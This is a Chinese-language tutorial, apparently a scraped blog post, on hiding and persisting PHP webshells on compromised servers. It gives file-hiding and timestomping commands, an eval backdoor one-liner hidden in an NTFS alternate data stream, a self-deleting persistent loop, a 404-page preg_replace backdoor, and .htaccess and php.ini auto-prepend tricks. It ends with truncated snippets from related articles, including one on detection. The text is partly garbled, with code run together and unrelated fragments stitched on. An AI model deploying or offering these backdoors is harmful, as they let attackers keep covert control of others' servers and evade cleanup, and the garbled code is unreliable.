如果想讓自己的webshell留的更久一些,除了webshell要免殺,還需要注意一些隱藏技巧,比如隱藏檔案,修改時間屬性,隱藏檔案內容等。
1、隱藏檔案
使用attrib +s +a +h +r命令就是把原本的資料夾增加了系統檔案屬性、存檔檔案屬性、唯讀檔案屬性和隱藏檔案屬性。
attrib +s +a +h +r shell.php //隱藏shell.php檔案當你試圖在一堆檔案中隱藏自己新建立的檔案,那麼,除了建立乙個迷惑性的檔名,還需要修改檔案的修改日期。
//修改時間修改set-itemproperty -path 2.txt lastwritetime -value "2020-11-01 12:12:12"//訪問時間修改set-itemproperty -path 2.txt lastaccesstime -value "2020-11-01 12:12:12"//建立時間修改set-itemproperty -path 2.txt creationtime -value "2020-11-01 12:12:12"get-itemproperty -path d:\1.dll | format-list -property * -forcepowershell.exe -command "ls 'upload\*.*' | foreach-object "在伺服器上echo乙個資料流檔案進去,比如index.php是網頁正常檔案,我們可以這樣子搞:
echo ^<?php @eval($_post['chopper']);?^> > index.php:hidden.jpg利用include函式,將index.php:hidden.jpg進行hex編碼,把這個ads檔案include進去,這樣子就可以正常解析我們的一句話了。
<?php @include(pack('h*','696e6465782e7068703a68696464656e2e6a7067'));?>不死馬會刪除自身,以程序的形式迴圈建立隱蔽的後門。
<?phpset_time_limit(0); ignore_user_abort(1); unlink(__file__); //刪除自身while(1)?>5、中介軟體後門
將編譯好的so檔案複製到modules資料夾,啟動後門模組,重啟apache。當傳送特定引數的字串過去時,即可觸發後門。
404頁面主要用來提公升使用者體驗,可用來隱藏後門檔案。
the requested url was not found on this server.
<?php@preg_replace("/[pageerror]/e",$_post['error'],"saft");header('http/1.1 404 not found');?>
一般.htaccess可以用來留後門和針對黑名單繞過,在上傳目錄建立.htaccess 檔案寫入,無需重啟即可生效,上傳png檔案解析。
另外,在.htaccess 加入php解析規則,把檔名包含1的解析成php,上傳1.txt即可解析。
8、利用 php.ini 隱藏後門檔案
php.ini 中可以指定在主檔案執行前後自動解析的檔名稱,常用於頁面公共頭部和尾部,也可以用來隱藏php後門。
;在php文件之前自動新增檔案。auto_prepend_file = "c:\tmp.txt";在php文件之後自動新增檔案。auto_prepend_file = "c:\tmp.txt"php隱藏後門,php後門隱藏技巧
一句話 and 大馬 phpspy 菜刀一句話 反射後門 func new reflectionfunction get m echo func invokeargs array get c 呼叫如x.php?m system c whoami 後門也可繞過某些檢測禁用system函式的防護系統 p...
警惕隱藏的後門!Diasp asp
也可以使用微軟提供的解碼工具 screnc.exe 解碼 在內的任何檔案 包括.asp 發現這個後門的 系統是前些年比較流行的cms系統 塵緣雅境 系統 此處,以其刪除掉這個檔案,我覺得應該考慮更換更加安全的cms系統,年久失修的塵緣雅境 及其修改版 存在太多的安全隱患,其中最嚴重的包括上傳漏洞。這...
如何發現隱藏的Webshell後門
那麼多 裡不可能我們一點點去找後門,另外,即使最好的webshell查殺軟體也不可能完全檢測出來所有的後門,這個時候我們可以通過檢測檔案的完整性來尋找 中隱藏的後門。檔案md5校驗diff命令 linux中的命令,可以檢視兩個文字檔案的差異 diff abbcdefhilnnppqrsttuvwy ...